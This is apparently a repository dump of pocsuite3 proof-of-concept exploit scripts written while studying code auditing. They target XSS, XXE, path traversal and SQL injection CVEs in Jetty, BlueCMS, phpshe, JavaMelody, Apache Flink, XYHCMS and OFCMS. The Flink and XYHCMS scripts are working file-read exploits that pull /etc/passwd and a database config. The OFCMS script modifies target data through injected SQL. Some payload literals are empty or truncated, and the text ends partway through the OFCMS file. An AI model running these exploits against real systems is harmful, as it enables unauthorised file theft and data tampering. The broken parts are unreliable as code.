├── README.md
├── XSS漏洞-Java
└── jetty_6_x_xss.py
├── XSS漏洞-Php
└── BlueCMS_1_6_xss.py
├── XXE漏洞-Php
└── phpshe_1_7_xxe.py
├── XXE漏洞-Java
└── javamelody_xxe_CVE_2018_15531.py
├── 文件下载漏洞-Java
└── apache_flink_cve_2020_17519_download.py
├── 文件下载漏洞-Php
└── XYHCMS_3_5_download.py
├── SQL注入-Java
└── Ofcms_1_1_2_sql.py
├── 命令注入-Java
└── Apache_Kylin_CVE_2020_13925_rce.py
├── 命令注入-php
└── seacms_6_45_rce.py
├── 文件上传漏洞-Java
└── zantaopms_CNVD_C_2020_121325_upload.py
├── 文件上传漏洞-Php
└── zantaopms_CNVD_C_2020_121325_upload.py
└── SQL注入-Php
└── zzcms_8_3_sql.py
/README.md:
--------------------------------------------------------------------------------
1 | # POC-Test
2 | ### 在学习代码审计过程中,复现了一些漏洞案例,并在其过程中使用Pocsuite3框架编写了对应POC。
3 | ### 声明:POC仅限于测试交流,严禁用于非法用途
4 | ### 命令注入案例
5 | Java:CVE-2020-13925 Apache Kylin命令注入漏洞,http://code2sec.com/cve-2020-13925-apache-kylinming-ling-zhu-ru-lou-dong.html
6 |
7 | Php: seacms 6.45 代码执行漏洞,https://github.com/jiangsir404/PHP-code-audit/blob/master/seacms/seacms%20%E5%A4%9A%E4%B8%AA%E7%89%88%E6%9C%AC%E7%9A%84%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%E6%80%BB%E7%BB%93(search.php).md
8 |
9 | ### SQL注入案例
10 | Java:CVE-2019-9615 OFCMS SQL注入漏洞,https://lanvnal.com/2020/03/15/ofcms-cve-2019-9615-fu-xian/
11 |
12 | Php:CVE-2018-14961 ZZCMS 8.3 前台SQL 注入漏洞,http://keac.club/2020/02/02/CVE-2018-14961/
13 |
14 | ### XXE漏洞案例
15 | Java:CVE-2018-15531,JavaMelody 组件 XXE 漏洞,https://paper.seebug.org/705/
16 |
17 | Php:phpshe v1.7 XXE 漏洞,https://www.sohu.com/a/307805554_354899
18 |
19 | ### XSS漏洞案例
20 | Java:Jetty6.x test页面反射型XSS漏洞,https://www.exploit-db.com/exploits/33564
21 |
22 | Php:BlueCMS V1.6 反射型XSS漏洞,http://wjlshare.com/archives/1473#XSS
23 |
24 | ### 文件上传漏洞案例
25 | Java: Weblogic 任意文件上传漏洞(CVE-2018-2894), https://paper.seebug.org/647/
26 |
27 | Php:禅道 <= 12.4.2 后台文件上传漏洞, https://www.windylh.com/2020/10/28/CNVD-C-2020-121325%EF%BC%9A%E7%A6%85%E9%81%93%E5%90%8E%E5%8F%B0%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E4%B8%8E%E5%A4%8D%E7%8E%B0/
28 |
29 | ### 文件下载漏洞案例
30 | Java:Apache Flink 任意文件下载漏洞(CVE-2020-17519),https://www.anquanke.com/post/id/228507#h3-8
31 |
32 | Php:XYHCMS V3.5任意文件下载漏洞,http://itren.xiaolee.net/p/2335042.html
--------------------------------------------------------------------------------
/XSS漏洞-Java/jetty_6_x_xss.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/4/4 21:36
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : jetty_6_x_xss.py
7 | # explain : 文件说明
8 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
9 | from urllib.parse import urljoin
10 |
class DemoPOC(POCBase):
    """pocsuite3 POC for a reflected XSS on the Jetty 6.x ``/test/`` page.

    ``_verify`` requests ``/test/<probe>`` on the target and reports it as
    vulnerable when the probe string is echoed in a 404 response body;
    ``_attack`` and ``_shell`` simply delegate to ``_verify``.
    """
    vulID = 'xxx'  # ssvid
    version = '3.0'
    author = ['seebug']
    vulDate = '2021-04-04'
    createDate = '2021-04-04'
    updateDate = '2021-04-04'
    # NOTE(review): this URL is the phpshe XXE write-up reused from another
    # POC in the repo; the README lists exploit-db 33564 for the Jetty case.
    references = ['https://www.sohu.com/a/307805554_354899']
    name = 'jetty 6.x 反射型XSS漏洞'
    appPowerLink = ''
    appName = 'jetty'
    appVersion = '<= 6.x'
    vulType = VUL_TYPE.XSS
    desc = '''
jetty 6.x 反射型XSS漏洞
'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _verify(self) -> Output:
        """Send one GET probe and wrap the outcome in an ``Output``.

        Returns:
            Output: success carrying ``URL``/``Payload`` when the probe is
            reflected in a 404 body, otherwise a failure output.
        """
        result = {}
        # NOTE(review): the probe literal is empty in this copy, so
        # ``xss_payload in resp.text`` below is always true and every 404
        # would be reported as vulnerable. The markup-unaware extraction of
        # this listing most likely stripped the original literal — treat
        # this copy as incomplete rather than as a working check.
        xss_payload = ""
        verify_payload = "/test/" + xss_payload
        # ``logger.warn`` is the deprecated alias of ``warning`` on a stdlib
        # logging.Logger (assuming pocsuite3's logger is one).
        logger.warn(verify_payload)
        # Leading "/" makes the probe replace the whole path of self.url.
        veri_url = urljoin(self.url,verify_payload)
        logger.warn(veri_url)
        headers = {
            "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        }
        try:
            # No timeout is given, so an unresponsive target blocks the scan.
            resp = requests.get(veri_url,headers=headers)
            # The check expects the probe reflected in a 404 page (presumably
            # the Jetty test servlet's error page — not verifiable from here).
            if xss_payload in resp.text and resp.status_code == 404:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = veri_url
                result['VerifyInfo']['Payload'] = verify_payload
        except Exception as e:
            # Any transport/HTTP error is logged and counted as "not vulnerable".
            logger.warn(str(e))
        return self.parse_output(result)

    def _attack(self) -> Output:
        """Same as ``_verify``; this POC has no separate attack mode."""
        return self._verify()

    def _shell(self) -> Output:
        """Same as ``_verify``; no shell mode is implemented."""
        return self._verify()

    def parse_output(self, result: dict) -> Output:
        """Turn ``result`` into an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
64 |
65 |
66 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/XSS漏洞-Php/BlueCMS_1_6_xss.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/4/4 10:30
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : EmpireCms_7_5_xss.py
7 | # explain : 文件说明
8 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
9 | from urllib.parse import urljoin
10 |
class DemoPOC(POCBase):
    """pocsuite3 POC for a reflected XSS in BlueCMS 1.6 ``ad_js.php``.

    ``_verify`` requests ``ad_js.php?ad_id=<probe>`` and reports the target
    as vulnerable when the probe is echoed in a 200 response;
    ``_attack`` and ``_shell`` delegate to ``_verify``.
    """
    vulID = 'xxx'  # ssvid
    version = '3.0'
    author = ['seebug']
    vulDate = '2021-04-04'
    createDate = '2021-04-04'
    updateDate = '2021-04-04'
    # NOTE(review): reused from the phpshe POC; the README cites
    # wjlshare.com/archives/1473 for the BlueCMS case.
    references = ['https://www.sohu.com/a/307805554_354899']
    name = 'BlueCMS V1.6 反射型XSS漏洞'
    appPowerLink = ''
    appName = 'BlueCMS'
    appVersion = '<= 1.6'
    vulType = VUL_TYPE.XSS
    desc = '''
BlueCMS V1.6 反射型XSS漏洞
'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _verify(self) -> Output:
        """Send one GET probe and wrap the outcome in an ``Output``.

        Returns:
            Output: success carrying ``URL``/``Payload`` when the probe is
            reflected in a 200 body, otherwise a failure output.
        """
        result = {}
        # NOTE(review): the probe literal is empty in this copy, so the
        # ``in resp.text`` test below is trivially true and any 200 response
        # is reported as vulnerable; the original literal was probably
        # stripped when this listing was extracted.
        xss_payload = ""
        # Relative path (no leading "/"): urljoin resolves it against the
        # last path segment of self.url, unlike the Jetty POC's "/test/".
        verify_payload = "ad_js.php?ad_id=" + xss_payload
        logger.warn(verify_payload)  # deprecated alias of logger.warning
        veri_url = urljoin(self.url,verify_payload)
        logger.warn(veri_url)
        headers = {
            "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        }
        try:
            # No timeout: an unresponsive target blocks the scan.
            resp = requests.get(veri_url,headers=headers)
            if xss_payload in resp.text and resp.status_code == 200:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = veri_url
                result['VerifyInfo']['Payload'] = verify_payload
        except Exception as e:
            # Transport errors are logged and reported as "not vulnerable".
            logger.warn(str(e))
        return self.parse_output(result)

    def _attack(self) -> Output:
        """Same as ``_verify``; no separate attack mode."""
        return self._verify()

    def _shell(self) -> Output:
        """Same as ``_verify``; no shell mode."""
        return self._verify()

    def parse_output(self, result: dict) -> Output:
        """Turn ``result`` into an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
64 |
65 |
66 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/XXE漏洞-Php/phpshe_1_7_xxe.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/3/26 22:10
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : phpshe_1_7_xxe.py
7 | # explain : 文件说明
8 | from pocsuite3.api import CEye
9 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
10 | from pocsuite3.lib.utils import random_str
11 | from urllib.parse import urljoin
12 |
class DemoPOC(POCBase):
    """pocsuite3 POC for the phpshe 1.7 XXE in the WeChat payment callback.

    ``_verify`` POSTs an XML body to
    ``/include/plugin/payment/wechat/notify_url.php`` and decides via a
    CEye out-of-band callback (DNS/HTTP to a random subdomain) whether the
    parser resolved the external entity. ``_attack``/``_shell`` delegate
    to ``_verify``.
    """
    vulID = 'xxx'  # ssvid
    version = '3.0'
    author = ['seebug']
    vulDate = '2021-03-26'
    createDate = '2021-03-26'
    updateDate = '2021-03-26'
    references = ['https://www.sohu.com/a/307805554_354899']
    name = 'phpshe xxe漏洞'
    appPowerLink = ''
    appName = 'phpshe'
    appVersion = '< 1.7'
    vulType = VUL_TYPE.XML_INJECTION
    desc = '''
phpshe xxe漏洞
'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE
    # CEye authentication token.
    # NOTE(review): a credential placeholder committed in source; read it
    # from an option or the environment instead so real tokens never land
    # in the repository.
    token = "xxxxxxxxxxxxx"

    def _verify(self) -> Output:
        """POST the XML probe and check CEye for the callback.

        Returns:
            Output: success with ``URL``/``Payload`` when CEye recorded a
            request for the random marker, otherwise a failure output.
        """
        result = {}
        CEye_main = CEye(token=self.token)
        ceye_subdomain = CEye_main.getsubdomain()
        # Per-run random marker; it is what ``verify_request`` looks for.
        random_uri = random_str(16)
        logger.info("random_url为:%s" % random_uri)
        # NOTE(review): as shown in this copy the literal has no ``%s``
        # slots for the two ``%`` arguments, so this line would raise
        # TypeError before the request is sent (and it sits outside the
        # try/except). Lines of the original literal appear to have been
        # dropped by the extraction; do not rely on this copy.
        verify_payload = """

%%xxe;
]>""" % (ceye_subdomain,random_uri)
        logger.warn(verify_payload)  # deprecated alias of logger.warning
        veri_url = urljoin(self.url,"/include/plugin/payment/wechat/notify_url.php")
        logger.warn(veri_url)
        headers = {
            "Content-Type": "text/xml",
            "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        }
        try:
            # The HTTP response itself is not inspected (``resp`` is unused);
            # the verdict comes solely from the out-of-band callback.
            resp = requests.post(veri_url,data=verify_payload,headers=headers)
            if CEye_main.verify_request(random_uri):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = veri_url
                result['VerifyInfo']['Payload'] = verify_payload
        except Exception as e:
            logger.warn(str(e))
        return self.parse_output(result)

    def _attack(self) -> Output:
        """Same as ``_verify``; no separate attack mode."""
        return self._verify()

    def _shell(self) -> Output:
        """Same as ``_verify``; no shell mode."""
        return self._verify()

    def parse_output(self, result: dict) -> Output:
        """Turn ``result`` into an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
75 |
76 |
77 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/XXE漏洞-Java/javamelody_xxe_CVE_2018_15531.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/3/25 23:02
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : javamelody_xxe_CVE_2018_15531.py
7 | # explain : 文件说明
8 | from pocsuite3.api import CEye
9 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
10 | from pocsuite3.lib.utils import random_str
11 |
class DemoPOC(POCBase):
    """pocsuite3 POC for CVE-2018-15531 (JavaMelody XXE).

    ``_verify`` POSTs an XML body straight to ``self.url`` with a
    ``SOAPAction`` header and decides via a CEye out-of-band callback
    whether the external entity was resolved. ``_attack``/``_shell``
    delegate to ``_verify``.
    """
    vulID = 'xxx'  # ssvid
    version = '3.0'
    author = ['seebug']
    vulDate = '2021-03-25'
    createDate = '2021-03-25'
    updateDate = '2021-03-25'
    references = ['https://paper.seebug.org/705/']
    name = 'CVE-2018-15531 javamelody XXE漏洞'
    appPowerLink = ''
    appName = 'javamelody'
    appVersion = '< 1.74.0'
    vulType = VUL_TYPE.XML_INJECTION
    desc = '''
CVE-2018-15531 javamelody XXE漏洞
'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE
    # CEye authentication token.
    # NOTE(review): placeholder credential in source; supply it through an
    # option or environment variable rather than committing it.
    token = "xxxxxxxx"

    def _verify(self) -> Output:
        """POST the XML probe to ``self.url`` and check CEye for the callback.

        Returns:
            Output: success with ``URL``/``Payload`` when CEye saw the random
            marker, otherwise a failure output.
        """
        result = {}
        CEye_main = CEye(token=self.token)
        ceye_subdomain = CEye_main.getsubdomain()
        random_uri = random_str(16)  # per-run marker checked by verify_request
        logger.info("random_url为:%s" % random_uri)
        # NOTE(review): in this copy the literal has no ``%s`` slots for the
        # two ``%`` arguments, so the formatting raises TypeError before any
        # request is made (outside the try/except). The original literal
        # appears truncated by extraction; treat this copy as incomplete.
        verify_payload = """

%%xxe;
]>""" % (ceye_subdomain,random_uri)
        logger.warn(verify_payload)  # deprecated alias of logger.warning
        # The target URL is used as-is; no path is appended.
        veri_url = self.url
        logger.warn(veri_url)
        headers = {
            "Content-Type": "text/xml",
            "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
            "SOAPAction": "aaa"
        }
        try:
            # ``resp`` is never inspected; the verdict is the OOB callback only.
            resp = requests.post(veri_url,data=verify_payload,headers=headers)
            if CEye_main.verify_request(random_uri):
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = veri_url
                result['VerifyInfo']['Payload'] = verify_payload
        except Exception as e:
            logger.warn(str(e))
        return self.parse_output(result)

    def _attack(self) -> Output:
        """Same as ``_verify``; no separate attack mode."""
        return self._verify()

    def _shell(self) -> Output:
        """Same as ``_verify``; no shell mode."""
        return self._verify()

    def parse_output(self, result: dict) -> Output:
        """Turn ``result`` into an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
75 |
76 |
77 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/文件下载漏洞-Java/apache_flink_cve_2020_17519_download.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/5/15 17:34
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : apache_flink_cve_2020_17519_download.py
7 | # explain : 文件说明
8 | import re
9 | import base64
10 | from collections import OrderedDict
11 | from pocsuite3.lib.core.interpreter_option import OptString
12 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
13 | from urllib.parse import quote
14 |
class DemoPOC(POCBase):
    """pocsuite3 POC for CVE-2020-17519 (Apache Flink JobManager file read).

    ``_verify`` fetches ``/etc/hosts`` through the double-URL-encoded
    traversal under ``/jobmanager/logs/``; ``_attack`` does the same for
    the ``filename`` option (default ``/etc/passwd``). Both put the full
    response body into the result as ``File_Content``. ``_shell``
    delegates to ``_attack``.
    """
    vulID = 'xxx'  # ssvid
    version = '3.0'
    author = ['seebug']
    vulDate = '2021-05-15'
    createDate = '2021-05-15'
    updateDate = '2021-05-15'
    # NOTE(review): this is the JavaMelody write-up; the README cites
    # anquanke.com/post/id/228507 for the Flink case.
    references = ['https://paper.seebug.org/705/']
    name = 'CVE-2020-17519 Apache Flink 文件下载漏洞'
    appPowerLink = ''
    appName = 'Apache Flink'
    appVersion = '1.11.0、1.11.1、1.11.2'
    vulType = VUL_TYPE.ARBITRARY_FILE_DOWNLOAD
    desc = '''
CVE-2020-17519 Apache Flink 文件下载漏洞
'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _options(self) -> OrderedDict:
        """Declare the optional ``filename`` option used by ``_attack``."""
        o = OrderedDict()
        o["filename"] = OptString('', description='下载文件名称', require=False)
        return o

    def _verify(self) -> Output:
        """Request ``/etc/hosts`` via the traversal and report the result.

        A hit is a 200 response whose body does not contain Flink's
        "file does not exist" message.

        Returns:
            Output: success with ``URL``/``Payload``/``File_Content`` on a
            hit, otherwise a failure output.
        """
        result = {}
        try:
            Flag_error = "This file does not exist in JobManager log dir"
            verify_payload = '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fhosts'
            # Plain concatenation: a trailing "/" on self.url yields "//jobmanager".
            verify_url = self.url + verify_payload
            logger.info(verify_url)
            # verify=False disables TLS certificate validation for this
            # request; no timeout is set either.
            verify_res = requests.get(verify_url,verify=False)
            # ``.decode()`` raises UnicodeDecodeError on non-UTF-8 content;
            # that is swallowed by the except below and reported as a miss.
            if verify_res.status_code ==200 and Flag_error not in verify_res.content.decode():
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = verify_url
                result['VerifyInfo']['Payload'] = verify_payload
                # NOTE(review): the whole file body ends up in the scan
                # output/logs — redact or truncate before sharing results.
                result['VerifyInfo']['File_Content'] = '\n'+ verify_res.content.decode()
        except Exception as e:
            logger.warn(str(e))  # deprecated alias of logger.warning
        return self.parse_output(result)

    def _attack(self) -> Output:
        """Fetch the ``filename`` option (default ``/etc/passwd``) the same way.

        Returns:
            Output: as for ``_verify``.
        """
        result = {}
        try:
            Flag_error = "This file does not exist in JobManager log dir"
            # NOTE(review): quote()'s second positional parameter is ``safe``,
            # not an encoding — 'utf-8' here is the set of characters left
            # unescaped. It yields the intended double encoding only because
            # '/' is thereby removed from the default safe set;
            # ``quote(..., safe='')`` would state that intent directly.
            if self.get_option("filename"):
                attack_filename = quote(quote(self.get_option("filename"),'utf-8'))
            else:
                attack_filename = quote(quote("/etc/passwd",'utf-8'))
            logger.info("下载文件为:" + attack_filename)
            attack_payload = '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..' + attack_filename
            attack_url = self.url + attack_payload
            logger.info(attack_url)
            # TLS validation disabled, no timeout (same as _verify).
            attack_res = requests.get(attack_url,verify=False)
            if attack_res.status_code ==200 and Flag_error not in attack_res.content.decode():
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = attack_url
                result['VerifyInfo']['Payload'] = attack_payload
                # Full file body is placed in the result; see note in _verify.
                result['VerifyInfo']['File_Content'] = '\n' + attack_res.content.decode()
        except Exception as e:
            logger.warn(str(e))
        return self.parse_output(result)

    def _shell(self) -> Output:
        """No shell mode; delegates to ``_attack``."""
        return self._attack()

    def parse_output(self, result: dict) -> Output:
        """Turn ``result`` into an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
89 |
90 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/文件下载漏洞-Php/XYHCMS_3_5_download.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/5/16 11:00
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : XYHCMS_3_5_download.py
7 | # explain : 文件说明
8 | import re
9 | import base64
10 | from collections import OrderedDict
11 | from pocsuite3.lib.core.interpreter_option import OptString
12 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
13 | from urllib.parse import quote
14 |
class DemoPOC(POCBase):
    """pocsuite3 POC for the XYHCMS 3.5 authenticated file download.

    Both modes call ``/xyhai.php?s=/Database/downFile/...`` with the
    caller-supplied ``PHPSESSID`` cookie (the endpoint is behind the admin
    session). ``_verify`` pulls ``xyhai.php`` itself; ``_attack`` pulls
    the ``filename`` option (default ``App\\Common\\Conf\\db.php``).
    ``_shell`` delegates to ``_attack``.
    """
    vulID = 'xxx'  # ssvid
    version = '3.0'
    author = ['seebug']
    vulDate = '2021-05-16'
    createDate = '2021-05-16'
    updateDate = '2021-05-16'
    # NOTE(review): JavaMelody write-up reused; the README cites
    # itren.xiaolee.net/p/2335042.html for XYHCMS.
    references = ['https://paper.seebug.org/705/']
    name = 'XYHCMS V3.5任意文件下载漏洞'
    appPowerLink = ''
    appName = 'XYHCMS'
    appVersion = '<= 3.5'
    vulType = VUL_TYPE.ARBITRARY_FILE_DOWNLOAD
    desc = '''
XYHCMS V3.5任意文件下载漏洞
'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _options(self) -> OrderedDict:
        """Declare ``filename`` (optional) and ``PHPSESSID`` (required)."""
        o = OrderedDict()
        o["filename"] = OptString('', description='下载文件名称', require=False)
        o["PHPSESSID"] = OptString('', description='这个poc需要PHPSESSID', require=True)
        return o

    def _verify(self) -> Output:
        """Download ``xyhai.php`` through the traversal and report the result.

        A hit is a 200 response whose body lacks the CMS's "file does not
        exist" text ("该文件不存在").

        Returns:
            Output: success with ``URL``/``Payload``/``File_Content`` on a
            hit, otherwise a failure output.
        """
        result = {}
        try:
            Flag_error = "该文件不存在"
            # In the Python literal '\\' is one backslash, so the path sent
            # is ..\..\..\xyhai.php.
            verify_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\xyhai.php/type/zip'
            verify_url = self.url + verify_payload  # plain concatenation, see Flink POC
            logger.info(verify_url)
            cookies = {
                'PHPSESSID': self.get_option("PHPSESSID")
            }
            # TLS validation disabled (verify=False); no timeout.
            verify_res = requests.get(verify_url,cookies=cookies,verify=False)
            if verify_res.status_code ==200 and Flag_error not in verify_res.content.decode():
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = verify_url
                result['VerifyInfo']['Payload'] = verify_payload
                # NOTE(review): full file body goes into the scan output.
                result['VerifyInfo']['File_Content'] = '\n'+ verify_res.content.decode()
        except Exception as e:
            logger.warn(str(e))  # deprecated alias of logger.warning
        return self.parse_output(result)

    def _attack(self) -> Output:
        """Download the ``filename`` option (or the default config path).

        Returns:
            Output: as for ``_verify``.
        """
        result = {}
        try:
            # NOTE(review): copied from the Flink POC — XYHCMS answers with
            # "该文件不存在" (used in _verify), not this English message, so a
            # 200 "not found" page is misreported as a successful download.
            Flag_error = "This file does not exist in JobManager log dir"
            if self.get_option("filename"):
                # '\\\\' is two backslashes in the resulting string.
                attack_filename = self.get_option("filename").replace('/','\\\\')
            else:
                # Presumably the CMS database config, judging by the name.
                attack_filename = 'App\\Common\\Conf\\db.php'
            logger.info("下载文件为:" + attack_filename)
            attack_payload = '/xyhai.php?s=/Database/downFile/file/..\\..\\..\\' + attack_filename + '/type/zip'
            attack_url = self.url + attack_payload
            logger.info(attack_url)
            cookies = {
                'PHPSESSID': self.get_option("PHPSESSID")
            }
            attack_res = requests.get(attack_url,cookies=cookies,verify=False)
            if attack_res.status_code ==200 and Flag_error not in attack_res.content.decode():
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = attack_url
                result['VerifyInfo']['Payload'] = attack_payload
                result['VerifyInfo']['File_Content'] = '\n' + attack_res.content.decode()
        except Exception as e:
            logger.warn(str(e))
        return self.parse_output(result)

    def _shell(self) -> Output:
        """No shell mode; delegates to ``_attack``."""
        return self._attack()

    def parse_output(self, result: dict) -> Output:
        """Turn ``result`` into an ``Output``: success if non-empty, else fail."""
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
96 |
97 | register_poc(DemoPOC)
--------------------------------------------------------------------------------
/SQL注入-Java/Ofcms_1_1_2_sql.py:
--------------------------------------------------------------------------------
1 | # encoding: utf-8
2 | # Author : Sma11stu
3 | # Datetime : 2021/3/21 10:01
4 | # Product : PyCharm
5 | # Project : pocsuite3
6 | # File : Ofcms_1_1_2_sql.py
7 | # explain : 文件说明
8 |
9 | import re
10 | import json
11 | from collections import OrderedDict
12 | from urllib.parse import urljoin
13 | from requests.cookies import RequestsCookieJar
14 | from pocsuite3.api import Output, POCBase, register_poc, requests, logger, POC_CATEGORY, OptDict, VUL_TYPE
15 | from pocsuite3.lib.utils import random_str
16 | from pocsuite3.lib.core.interpreter_option import OptString
17 |
class DemoPOC(POCBase):
    """pocsuite3 POC for CVE-2019-9615 (OFCMS <= 1.1.2 authenticated SQLi).

    ``login`` obtains an admin ``JSESSIONID`` from the supplied
    credentials; ``_verify`` then posts a statement to the
    ``system/generate/create.json`` endpoint and checks the response for a
    random marker. ``_attack``/``_shell`` delegate to ``_verify``.
    """
    vulID = 'xxx'  # ssvid
    version = '3.0'
    author = ['seebug']
    vulDate = '2021-03-21'
    createDate = '2021-03-21'
    updateDate = '2021-03-21'
    references = ['https://lanvnal.com/2020/03/15/ofcms-cve-2019-9615-fu-xian/']
    name = 'Ofcms<=1.1.2 Sql注入漏洞-CVE-2019-9615'
    appPowerLink = ''
    appName = 'Ofcms'
    appVersion = '< 1.1.2'
    vulType = VUL_TYPE.SQL_INJECTION
    desc = '''
Ofcms<=1.1.2 Sql注入漏洞-CVE-2019-9615
'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.REMOTE

    def _options(self) -> OrderedDict:
        """Declare the required ``username``/``password`` options."""
        o = OrderedDict()
        o["username"] = OptString('', description='这个poc需要用户登录,请输入登录账号', require=True)
        o["password"] = OptString('', description='这个poc需要用户密码,请输入用户密码', require=True)
        return o

    def login(self) -> str:
        """Log in to the admin backend and return a ``Cookie`` header value.

        Posts the credentials as JSON to ``/ofcms-admin/admin/dologin.json``
        and, when the body reports ``code == '200'``, builds
        ``"JSESSIONID=<value>"`` from the response cookies.

        NOTE(review): ``cookie`` is bound only on the success path. A
        rejected login, a non-200 status or an exception falls through to
        ``return cookie`` and raises ``UnboundLocalError`` rather than a
        clear login failure.
        """
        login_url = urljoin(self.url, '/ofcms-admin/admin/dologin.json')
        post_data = {
            "username": self.get_option("username"),
            "password": self.get_option("password")
        }
        # NOTE(review): built but never passed to requests.post below, so the
        # JSON Content-Type is not actually sent with the login request.
        headers = {
            "Content-Type": "application/json; charset=UTF-8",
            "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
        }
        try:
            resp = requests.post(login_url, data=json.dumps(post_data))
            # The backend signals success with a string code in the JSON body.
            if resp.status_code == 200 and json.loads(resp.text)['code'] == '200':
                cookies = requests.utils.dict_from_cookiejar(resp.cookies)
                cookie = "JSESSIONID="+cookies["JSESSIONID"]
                logger.info("获得的Cookie为:%s" % cookie)
                logger.info("Ofcms系统登录成功")
            else:
                logger.info("Ofcms系统登录失败,报错为 %s " % str(resp.text))
        except Exception as e:
            logger.warn(e)  # deprecated alias of logger.warning
            logger.warn("Ofcms系统登录失败")
        return cookie

    def _verify(self) -> Output:
        """Log in, post the probe statement and look for the marker.

        Returns:
            Output: success with ``URL``/``Payload`` when ``~<marker>~``
            appears in the response, otherwise a failure output.
        """
        result = {}
        cookies = self.login()  # raw "JSESSIONID=..." header string
        random_uri = random_str(16)
        logger.info("random_uri为:%s" % random_uri)
        # NOTE(review): this verification statement is an UPDATE on
        # ``of_cms_link`` (link_id=4), i.e. it modifies target data; a
        # verify step is expected to be side-effect free, and the change is
        # not reverted afterwards.
        verify_payload = "update of_cms_link set link_name=updatexml(1,concat(0x7e,('" + random_uri + "'),0x7e),0) where link_id=4"
        post_data = {
            "sql" : verify_payload
        }
        veri_url = urljoin(self.url, '/ofcms-admin/admin/system/generate/create.json?sqlid=')
        headers = {
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
            "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
            "Cookie": cookies
        }
        logger.info("Headres如下:")
        logger.info(headers)  # logs the session cookie in clear
        try:
            resp = requests.post(veri_url,data=post_data,headers=headers)
            # 0x7e is "~": the marker is expected back wrapped in tildes.
            flag = "~" + random_uri + "~"
            if flag in resp.text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = veri_url
                result['VerifyInfo']['Payload'] = verify_payload
        except Exception as e:
            logger.warn(str(e))
